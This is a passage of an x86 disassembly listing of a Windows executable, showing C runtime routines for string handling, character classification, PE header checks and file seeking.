		pop	ecx

loc_40CCC2:				; CODE XREF: sub_40CC84+7j
					; sub_40CC84+35j
		pop	esi
		retn
sub_40CC84	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CCC4	proc near		; CODE XREF: sub_4053E1+43p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_40CD4B
		mov	eax, [esi+0Ch]
		cmp	eax, off_424F44
		jz	short loc_40CCDF
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CCDF:				; CODE XREF: sub_40CCC4+12j
		mov	eax, [esi+10h]
		cmp	eax, off_424F48
		jz	short loc_40CCF1
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CCF1:				; CODE XREF: sub_40CCC4+24j
		mov	eax, [esi+14h]
		cmp	eax, off_424F4C
		jz	short loc_40CD03
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CD03:				; CODE XREF: sub_40CCC4+36j
		mov	eax, [esi+18h]
		cmp	eax, off_424F50
		jz	short loc_40CD15
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CD15:				; CODE XREF: sub_40CCC4+48j
		mov	eax, [esi+1Ch]
		cmp	eax, off_424F54
		jz	short loc_40CD27
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CD27:				; CODE XREF: sub_40CCC4+5Aj
		mov	eax, [esi+20h]
		cmp	eax, off_424F58
		jz	short loc_40CD39
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CD39:				; CODE XREF: sub_40CCC4+6Cj
		mov	esi, [esi+24h]
		cmp	esi, off_424F5C
		jz	short loc_40CD4B
		push	esi
		call	sub_403B91
		pop	ecx

loc_40CD4B:				; CODE XREF: sub_40CCC4+7j
					; sub_40CCC4+7Ej
		pop	esi
		retn
sub_40CCC4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CD4D	proc near		; CODE XREF: sub_40A074+117p
					; sub_40A074+139p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	eax, [esp+arg_0]
		push	ebx
		xor	ebx, ebx
		cmp	eax, ebx
		push	esi
		push	edi
		jz	short loc_40CD62
		mov	edi, [esp+0Ch+arg_4]
		cmp	edi, ebx
		ja	short loc_40CD7D

loc_40CD62:				; CODE XREF: sub_40CD4D+Bj
					; sub_40CD4D+3Aj
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_40CD6C:				; CODE XREF: sub_40CD4D+69j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_40CDBA
; ---------------------------------------------------------------------------

loc_40CD7D:				; CODE XREF: sub_40CD4D+13j
		mov	esi, [esp+0Ch+arg_8]
		cmp	esi, ebx
		jnz	short loc_40CD89

loc_40CD85:				; CODE XREF: sub_40CD4D+48j
		mov	[eax], bl
		jmp	short loc_40CD62
; ---------------------------------------------------------------------------

loc_40CD89:				; CODE XREF: sub_40CD4D+36j
		mov	edx, eax

loc_40CD8B:				; CODE XREF: sub_40CD4D+44j
		cmp	[edx], bl
		jz	short loc_40CD93
		inc	edx
		dec	edi
		jnz	short loc_40CD8B

loc_40CD93:				; CODE XREF: sub_40CD4D+40j
		cmp	edi, ebx
		jz	short loc_40CD85

loc_40CD97:				; CODE XREF: sub_40CD4D+55j
		mov	cl, [esi]
		mov	[edx], cl
		inc	edx
		inc	esi
		cmp	cl, bl
		jz	short loc_40CDA4
		dec	edi
		jnz	short loc_40CD97

loc_40CDA4:				; CODE XREF: sub_40CD4D+52j
		cmp	edi, ebx
		jnz	short loc_40CDB8
		mov	[eax], bl
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_40CD6C
; ---------------------------------------------------------------------------

loc_40CDB8:				; CODE XREF: sub_40CD4D+59j
		xor	eax, eax

loc_40CDBA:				; CODE XREF: sub_40CD4D+2Ej
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40CD4D	endp

; ---------------------------------------------------------------------------
		align 10h
		push	ebp
		mov	ebp, esp
		push	esi
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		mov	edx, [ebp+0Ch]
		lea	ecx, [ecx+0]

loc_40CDD4:				; CODE XREF: .text:0040CDE1j
		mov	al, [edx]
		or	al, al
		jz	short loc_40CDE3
		add	edx, 1
		bts	[esp], eax
		jmp	short loc_40CDD4
; ---------------------------------------------------------------------------

loc_40CDE3:				; CODE XREF: .text:0040CDD8j
		mov	esi, [ebp+8]
		or	ecx, 0FFFFFFFFh
		lea	ecx, [ecx+0]

loc_40CDEC:				; CODE XREF: .text:0040CDFCj
		add	ecx, 1
		mov	al, [esi]
		or	al, al
		jz	short loc_40CDFE
		add	esi, 1
		bt	[esp], eax
		jnb	short loc_40CDEC

loc_40CDFE:				; CODE XREF: .text:0040CDF3j
		mov	eax, ecx
		add	esp, 20h
		pop	esi
		leave
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CE06	proc near		; CODE XREF: sub_40A074+F1p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		xor	ebx, ebx
		cmp	[ebp+arg_C], ebx
		push	edi
		jnz	short loc_40CE26
		cmp	esi, ebx
		jnz	short loc_40CE2A
		cmp	[ebp+arg_4], ebx
		jnz	short loc_40CE31

loc_40CE1F:				; CODE XREF: sub_40CE06+4Dj
					; sub_40CE06+8Cj
		xor	eax, eax

loc_40CE21:				; CODE XREF: sub_40CE06+44j
					; sub_40CE06+9Ej
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_40CE26:				; CODE XREF: sub_40CE06+Ej
		cmp	esi, ebx
		jz	short loc_40CE31

loc_40CE2A:				; CODE XREF: sub_40CE06+12j
		mov	edi, [ebp+arg_4]
		cmp	edi, ebx
		ja	short loc_40CE4C

loc_40CE31:				; CODE XREF: sub_40CE06+17j
					; sub_40CE06+22j ...
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_40CE3B:				; CODE XREF: sub_40CE06+B1j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_40CE21
; ---------------------------------------------------------------------------

loc_40CE4C:				; CODE XREF: sub_40CE06+29j
		cmp	[ebp+arg_C], ebx
		jnz	short loc_40CE55
		mov	[esi], bl
		jmp	short loc_40CE1F
; ---------------------------------------------------------------------------

loc_40CE55:				; CODE XREF: sub_40CE06+49j
		mov	edx, [ebp+arg_8]
		cmp	edx, ebx
		jnz	short loc_40CE60
		mov	[esi], bl
		jmp	short loc_40CE31
; ---------------------------------------------------------------------------

loc_40CE60:				; CODE XREF: sub_40CE06+54j
		cmp	[ebp+arg_C], 0FFFFFFFFh
		mov	eax, esi
		jnz	short loc_40CE77

loc_40CE68:				; CODE XREF: sub_40CE06+6Dj
		mov	cl, [edx]
		mov	[eax], cl
		inc	eax
		inc	edx
		cmp	cl, bl
		jz	short loc_40CE90
		dec	edi
		jnz	short loc_40CE68
		jmp	short loc_40CE90
; ---------------------------------------------------------------------------

loc_40CE77:				; CODE XREF: sub_40CE06+60j
					; sub_40CE06+81j
		mov	cl, [edx]
		mov	[eax], cl
		inc	eax
		inc	edx
		cmp	cl, bl
		jz	short loc_40CE89
		dec	edi
		jz	short loc_40CE89
		dec	[ebp+arg_C]
		jnz	short loc_40CE77

loc_40CE89:				; CODE XREF: sub_40CE06+79j
					; sub_40CE06+7Cj
		cmp	[ebp+arg_C], ebx
		jnz	short loc_40CE90
		mov	[eax], bl

loc_40CE90:				; CODE XREF: sub_40CE06+6Aj
					; sub_40CE06+6Fj ...
		cmp	edi, ebx
		jnz	short loc_40CE1F
		cmp	[ebp+arg_C], 0FFFFFFFFh
		jnz	short loc_40CEA9
		mov	eax, [ebp+arg_4]
		push	50h
		mov	[esi+eax-1], bl
		pop	eax
		jmp	loc_40CE21
; ---------------------------------------------------------------------------

loc_40CEA9:				; CODE XREF: sub_40CE06+92j
		mov	[esi], bl
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_40CE3B
sub_40CE06	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CEB9	proc near		; CODE XREF: sub_40EF87+32p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		and	[ebp+var_4], 0
		push	ebx
		mov	ebx, [ebp+arg_8]
		test	ebx, ebx
		jnz	short loc_40CED0
		xor	eax, eax
		jmp	loc_40CF6A
; ---------------------------------------------------------------------------

loc_40CED0:				; CODE XREF: sub_40CEB9+Ej
		cmp	ebx, 4
		push	edi
		jb	short loc_40CF4B
		lea	edi, [ebx-4]
		test	edi, edi
		jbe	short loc_40CF4B
		mov	ecx, [ebp+arg_4]
		mov	eax, [ebp+arg_0]

loc_40CEE3:				; CODE XREF: sub_40CEB9+66j
		mov	dl, [eax]
		add	eax, 4
		add	ecx, 4
		test	dl, dl
		jz	short loc_40CF41
		cmp	dl, [ecx-4]
		jnz	short loc_40CF41
		mov	dl, [eax-3]
		test	dl, dl
		jz	short loc_40CF37
		cmp	dl, [ecx-3]
		jnz	short loc_40CF37
		mov	dl, [eax-2]
		test	dl, dl
		jz	short loc_40CF2D
		cmp	dl, [ecx-2]
		jnz	short loc_40CF2D
		mov	dl, [eax-1]
		test	dl, dl
		jz	short loc_40CF23
		cmp	dl, [ecx-1]
		jnz	short loc_40CF23
		add	[ebp+var_4], 4
		cmp	[ebp+var_4], edi
		jb	short loc_40CEE3
		jmp	short loc_40CF62
; ---------------------------------------------------------------------------

loc_40CF23:				; CODE XREF: sub_40CEB9+58j
					; sub_40CEB9+5Dj
		movzx	eax, byte ptr [eax-1]
		movzx	ecx, byte ptr [ecx-1]
		jmp	short loc_40CF73
; ---------------------------------------------------------------------------

loc_40CF2D:				; CODE XREF: sub_40CEB9+4Cj
					; sub_40CEB9+51j
		movzx	eax, byte ptr [eax-2]
		movzx	ecx, byte ptr [ecx-2]
		jmp	short loc_40CF73
; ---------------------------------------------------------------------------

loc_40CF37:				; CODE XREF: sub_40CEB9+40j
					; sub_40CEB9+45j
		movzx	eax, byte ptr [eax-3]
		movzx	ecx, byte ptr [ecx-3]
		jmp	short loc_40CF73
; ---------------------------------------------------------------------------

loc_40CF41:				; CODE XREF: sub_40CEB9+34j
					; sub_40CEB9+39j
		movzx	eax, byte ptr [eax-4]
		movzx	ecx, byte ptr [ecx-4]
		jmp	short loc_40CF73
; ---------------------------------------------------------------------------

loc_40CF4B:				; CODE XREF: sub_40CEB9+1Bj
					; sub_40CEB9+22j
		mov	ecx, [ebp+arg_4]
		mov	eax, [ebp+arg_0]
		jmp	short loc_40CF62
; ---------------------------------------------------------------------------

loc_40CF53:				; CODE XREF: sub_40CEB9+ACj
		mov	dl, [eax]
		test	dl, dl
		jz	short loc_40CF6D
		cmp	dl, [ecx]
		jnz	short loc_40CF6D
		inc	eax
		inc	ecx
		inc	[ebp+var_4]

loc_40CF62:				; CODE XREF: sub_40CEB9+68j
					; sub_40CEB9+98j
		cmp	[ebp+var_4], ebx
		jb	short loc_40CF53
		xor	eax, eax

loc_40CF69:				; CODE XREF: sub_40CEB9+BCj
		pop	edi

loc_40CF6A:				; CODE XREF: sub_40CEB9+12j
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40CF6D:				; CODE XREF: sub_40CEB9+9Ej
					; sub_40CEB9+A2j
		movzx	eax, byte ptr [eax]
		movzx	ecx, byte ptr [ecx]

loc_40CF73:				; CODE XREF: sub_40CEB9+72j
					; sub_40CEB9+7Cj ...
		sub	eax, ecx
		jmp	short loc_40CF69
sub_40CEB9	endp

; ---------------------------------------------------------------------------
		align 10h
		push	ebp
		mov	ebp, esp
		push	esi
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		mov	edx, [ebp+0Ch]
		lea	ecx, [ecx+0]

loc_40CF94:				; CODE XREF: .text:0040CFA1j
		mov	al, [edx]
		or	al, al
		jz	short loc_40CFA3
		add	edx, 1
		bts	[esp], eax
		jmp	short loc_40CF94
; ---------------------------------------------------------------------------

loc_40CFA3:				; CODE XREF: .text:0040CF98j
		mov	esi, [ebp+8]
		mov	edi, edi

loc_40CFA8:				; CODE XREF: .text:0040CFB5j
		mov	al, [esi]
		or	al, al
		jz	short loc_40CFBA
		add	esi, 1
		bt	[esp], eax
		jnb	short loc_40CFA8
		lea	eax, [esi-1]

loc_40CFBA:				; CODE XREF: .text:0040CFACj
		add	esp, 20h
		pop	esi
		leave
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CFC0	proc near		; CODE XREF: sub_405C1A+93p
					; sub_406F97+34Dp ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		movzx	eax, [ebp+arg_0]
		mov	ecx, [ebp+var_10]
		mov	ecx, [ecx+0C8h]
		movzx	eax, word ptr [ecx+eax*2]
		and	eax, 8000h
		cmp	[ebp+var_4], 0
		jz	short locret_40CFF4
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40CFF4:				; CODE XREF: sub_40CFC0+2Bj
		leave
		retn
sub_40CFC0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CFF6	proc near		; CODE XREF: sub_409427+6CBp
					; sub_409427+B85p ...

arg_0		= dword	ptr  4

		push	0
		push	[esp+4+arg_0]
		call	sub_40CFC0
		pop	ecx
		pop	ecx
		retn
sub_40CFF6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D004	proc near		; CODE XREF: sub_405C1A+32p
					; sub_40A9EB+81p ...

var_18		= dword	ptr -18h
var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_8		= byte ptr -8
var_7		= byte ptr -7
var_6		= byte ptr -6
var_4		= word ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		push	ebx
		push	[ebp+arg_8]
		lea	ecx, [ebp+var_18]
		call	sub_402CAD
		mov	ebx, [ebp+arg_0]
		lea	eax, [ebx+1]
		cmp	eax, 100h
		ja	short loc_40D032
		mov	eax, [ebp+var_18]
		mov	eax, [eax+0C8h]
		movzx	eax, word ptr [eax+ebx*2]
		jmp	short loc_40D0A7
; ---------------------------------------------------------------------------

loc_40D032:				; CODE XREF: sub_40D004+1Dj
		mov	[ebp+arg_0], ebx
		sar	[ebp+arg_0], 8
		lea	eax, [ebp+var_18]
		push	eax
		mov	eax, [ebp+arg_0]
		and	eax, 0FFh
		push	eax
		call	sub_40CFC0
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_40D063
		mov	al, byte ptr [ebp+arg_0]
		push	2
		mov	[ebp+var_8], al
		mov	[ebp+var_7], bl
		mov	[ebp+var_6], 0
		pop	ecx
		jmp	short loc_40D06D
; ---------------------------------------------------------------------------

loc_40D063:				; CODE XREF: sub_40D004+4Bj
		xor	ecx, ecx
		mov	[ebp+var_8], bl
		mov	[ebp+var_7], 0
		inc	ecx

loc_40D06D:				; CODE XREF: sub_40D004+5Dj
		mov	eax, [ebp+var_18]
		push	1
		push	dword ptr [eax+14h]
		push	dword ptr [eax+4]
		lea	eax, [ebp+var_4]
		push	eax
		push	ecx
		lea	eax, [ebp+var_8]
		push	eax
		lea	eax, [ebp+var_18]
		push	1
		push	eax
		call	sub_40CAB4
		add	esp, 20h
		test	eax, eax
		jnz	short loc_40D0A3
		cmp	[ebp+var_C], al
		jz	short loc_40D09F
		mov	eax, [ebp+var_10]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40D09F:				; CODE XREF: sub_40D004+92j
		xor	eax, eax
		jmp	short loc_40D0B7
; ---------------------------------------------------------------------------

loc_40D0A3:				; CODE XREF: sub_40D004+8Dj
		movzx	eax, [ebp+var_4]

loc_40D0A7:				; CODE XREF: sub_40D004+2Cj
		and	eax, [ebp+arg_4]
		cmp	[ebp+var_C], 0
		jz	short loc_40D0B7
		mov	ecx, [ebp+var_10]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_40D0B7:				; CODE XREF: sub_40D004+9Dj
					; sub_40D004+AAj
		pop	ebx
		leave
		retn
sub_40D004	endp


; =============== S U B	R O U T	I N E =======================================



sub_40D0BA	proc near		; CODE XREF: sub_4080D9+Fp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_42877C, eax
		retn
sub_40D0BA	endp

; ---------------------------------------------------------------------------

loc_40D0C4:				; DATA XREF: sub_40D0D4:loc_40D139o
		push	dword ptr [esp+4]
		call	ds:off_41E11C
		xor	eax, eax
		inc	eax
		retn	8

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D0D4	proc near		; CODE XREF: sub_405E41+26p
					; sub_405EF4+78p ...

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	14h
		push	offset dword_422CD0
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+var_1C], edi
		push	dword_42877C
		call	sub_405753
		pop	ecx
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_40D14A
		lea	eax, [ebp+var_1C]
		push	eax
		call	sub_407EC6
		pop	ecx
		cmp	eax, edi
		jz	short loc_40D112
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4033CB
		add	esp, 14h

loc_40D112:				; CODE XREF: sub_40D0D4+2Fj
		cmp	[ebp+var_1C], 1
		jz	short loc_40D139
		push	offset aKernel32_dl_10 ; "kernel32.dll"
		call	ds:dword_41E0E0	; GetModuleHandleA
		cmp	eax, edi
		jz	short loc_40D139
		push	offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
		push	eax
		call	ds:off_41E0E8
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_40D13E

loc_40D139:				; CODE XREF: sub_40D0D4+42j
					; sub_40D0D4+51j
		mov	esi, offset loc_40D0C4

loc_40D13E:				; CODE XREF: sub_40D0D4+63j
		push	esi
		call	sub_4056E7
		pop	ecx
		mov	dword_42877C, eax

loc_40D14A:				; CODE XREF: sub_40D0D4+21j
		mov	[ebp+ms_exc.disabled], edi
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi	; MultiByteToWideChar
		mov	[ebp+var_20], eax
		jmp	short loc_40D189
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		mov	[ebp+var_24], eax
		xor	ecx, ecx
		cmp	eax, 0C0000017h
		setz	cl
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		cmp	[ebp+var_24], 0C0000017h
		jnz	short loc_40D185
		push	8
		call	ds:dword_41E170	; RtlRestoreLastWin32Error

loc_40D185:				; CODE XREF: sub_40D0D4+A7j
		and	[ebp+var_20], 0

loc_40D189:				; CODE XREF: sub_40D0D4+84j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		mov	eax, [ebp+var_20]
		call	__SEH_epilog4
		retn
sub_40D0D4	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40D1A0	proc near		; CODE XREF: sub_40D212+16p

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		cmp	word ptr [ecx],	5A4Dh
		jz	short loc_40D1AE

loc_40D1AB:				; CODE XREF: sub_40D1A0+19j
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_40D1AE:				; CODE XREF: sub_40D1A0+9j
		mov	eax, [ecx+3Ch]
		add	eax, ecx
		cmp	dword ptr [eax], 4550h
		jnz	short loc_40D1AB
		xor	ecx, ecx
		cmp	word ptr [eax+18h], 10Bh
		setz	cl
		mov	eax, ecx
		retn
sub_40D1A0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_40D1D0	proc near		; CODE XREF: sub_40D212+27p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		mov	ecx, [eax+3Ch]
		add	ecx, eax
		movzx	eax, word ptr [ecx+14h]
		push	ebx
		push	esi
		movzx	esi, word ptr [ecx+6]
		xor	edx, edx
		test	esi, esi
		push	edi
		lea	eax, [eax+ecx+18h]
		jbe	short loc_40D20C
		mov	edi, [esp+0Ch+arg_4]

loc_40D1F2:				; CODE XREF: sub_40D1D0+3Aj
		mov	ecx, [eax+0Ch]
		cmp	edi, ecx
		jb	short loc_40D202
		mov	ebx, [eax+8]
		add	ebx, ecx
		cmp	edi, ebx
		jb	short loc_40D20E

loc_40D202:				; CODE XREF: sub_40D1D0+27j
		add	edx, 1
		add	eax, 28h
		cmp	edx, esi
		jb	short loc_40D1F2

loc_40D20C:				; CODE XREF: sub_40D1D0+1Cj
		xor	eax, eax

loc_40D20E:				; CODE XREF: sub_40D1D0+30j
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40D1D0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D212	proc near		; CODE XREF: sub_406C00+FFp
					; sub_407F39+Ep ...

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_422CF0
		call	__SEH_prolog4
		and	[ebp+ms_exc.disabled], 0
		mov	edx, 400000h
		push	edx
		call	sub_40D1A0
		pop	ecx
		test	eax, eax
		jz	short loc_40D26F
		mov	eax, [ebp+arg_0]
		sub	eax, edx
		push	eax
		push	edx
		call	sub_40D1D0
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_40D26F
		mov	eax, [eax+24h]
		shr	eax, 1Fh
		not	eax
		and	eax, 1
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		jmp	short loc_40D278
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		xor	ecx, ecx
		cmp	eax, 0C0000005h
		setz	cl
		mov	eax, ecx
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]

loc_40D26F:				; CODE XREF: sub_40D212+1Ej
					; sub_40D212+30j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		xor	eax, eax

loc_40D278:				; CODE XREF: sub_40D212+44j
		call	__SEH_epilog4
		retn
sub_40D212	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D27E	proc near		; CODE XREF: sub_40A36D+2EEp
					; sub_40A36D+3C8p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	eax, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_0]
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_8]
		push	edi
		push	esi
		mov	[ebp+var_4], eax
		call	sub_40F33D
		or	edi, 0FFFFFFFFh
		cmp	eax, edi
		pop	ecx
		jnz	short loc_40D2B3
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_40D2AD:				; CODE XREF: sub_40D27E+5Ej
		mov	eax, edi
		mov	edx, edi
		jmp	short loc_40D2FD
; ---------------------------------------------------------------------------

loc_40D2B3:				; CODE XREF: sub_40D27E+22j
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_4]
		push	ecx
		push	[ebp+var_8]
		push	eax
		call	ds:off_41E074
		cmp	eax, edi
		mov	[ebp+var_8], eax
		jnz	short loc_40D2DE
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		test	eax, eax
		jz	short loc_40D2DE
		push	eax
		call	sub_405DB9
		pop	ecx
		jmp	short loc_40D2AD
; ---------------------------------------------------------------------------

loc_40D2DE:				; CODE XREF: sub_40D27E+4Bj
					; sub_40D27E+55j
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_437700[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FDh
		mov	eax, [ebp+var_8]
		mov	edx, [ebp+var_4]

loc_40D2FD:				; CODE XREF: sub_40D27E+33j
		pop	edi
		pop	esi
		leave
		retn
sub_40D27E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40D301	proc near		; CODE XREF: sub_406D96+116p

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	14h
		push	offset dword_422D10
		call	__SEH_prolog4
		or	esi, 0FFFFFFFFh
		mov	[ebp+var_24], esi
		mov	[ebp+var_20], esi
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40D33A
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_40D331:				; CODE XREF: sub_40D301+66j
		mov	eax, esi
		mov	edx, esi
		jmp	loc_40D40A
; ---------------------------------------------------------------------------

loc_40D33A:				; CODE XREF: sub_40D301+1Bj
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_40D348
		cmp	eax, dword_4376E4
		jb	short loc_40D369

loc_40D348:				; CODE XREF: sub_40D301+3Dj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_40D331
; ---------------------------------------------------------------------------

loc_40D369:				; CODE XREF: sub_40D301+45j
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:437700h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jnz	short loc_40D3AF
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		or	edx, 0FFFFFFFFh
		mov	eax, edx
		jmp	short loc_40D40A
; ---------------------------------------------------------------------------

loc_40D3AF:				; CODE XREF: sub_40D301+86j
		push	eax
		call	sub_40F3AE
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_40D3DE
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40D27E
		add	esp, 10h
		mov	[ebp+var_24], eax
		mov	[ebp+var_20], edx
		jmp	short loc_40D3F8
; ---------------------------------------------------------------------------

loc_40D3DE:				; CODE XREF: sub_40D301+BFj
		call	sub_405D93
		mov	dword ptr [eax], 9
		call	sub_405DA6
		mov	[eax], edi
		or	[ebp+var_24], 0FFFFFFFFh
		or	[ebp+var_20], 0FFFFFFFFh

loc_40D3F8:				; CODE XREF: sub_40D301+DBj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40D410
		mov	eax, [ebp+var_24]
		mov	edx, [ebp+var_20]

loc_40D40A:				; CODE XREF: sub_40D301+34j
					; sub_40D301+ACj
		call	__SEH_epilog4
		retn
sub_40D301	endp


; =============== S U B	R O U T	I N E =======================================



sub_40D410	proc near		; CODE XREF: sub_40D301+FEp
					; DATA XREF: jlrllt49:00422D28o
		push	dword ptr [ebp+8]
		call	sub_40F44E
		pop	ecx
		retn
sub_40D410	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=518h


sub_40D41A	proc near		; CODE XREF: sub_40D9E0+9Ap
					; sub_410B67+BBp

var_594		= dword	ptr -594h
var_590		= dword	ptr -590h
var_58C		= dword	ptr -58Ch
var_588		= dword	ptr -588h
var_584		= dword	ptr -584h
var_580		= dword	ptr -580h
var_57C		= dword	ptr -57Ch
var_578		= dword	ptr -578h
var_574		= dword	ptr -574h
var_56D		= byte ptr -56Dh
var_56C		= dword	ptr -56Ch
var_568		= dword	ptr -568h
var_564		= byte ptr -564h
var_410		= byte ptr -410h
var_160		= byte ptr -160h
var_C		= byte ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		lea	ebp, [esp-518h]
		sub	esp, 594h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+518h+var_4], eax
		mov	eax, [ebp+518h+arg_4]
		push	esi
		xor	esi, esi
		cmp	[ebp+518h+arg_8], esi
		mov	[ebp+518h+var_57C], eax
		mov	[ebp+518h+var_578], esi
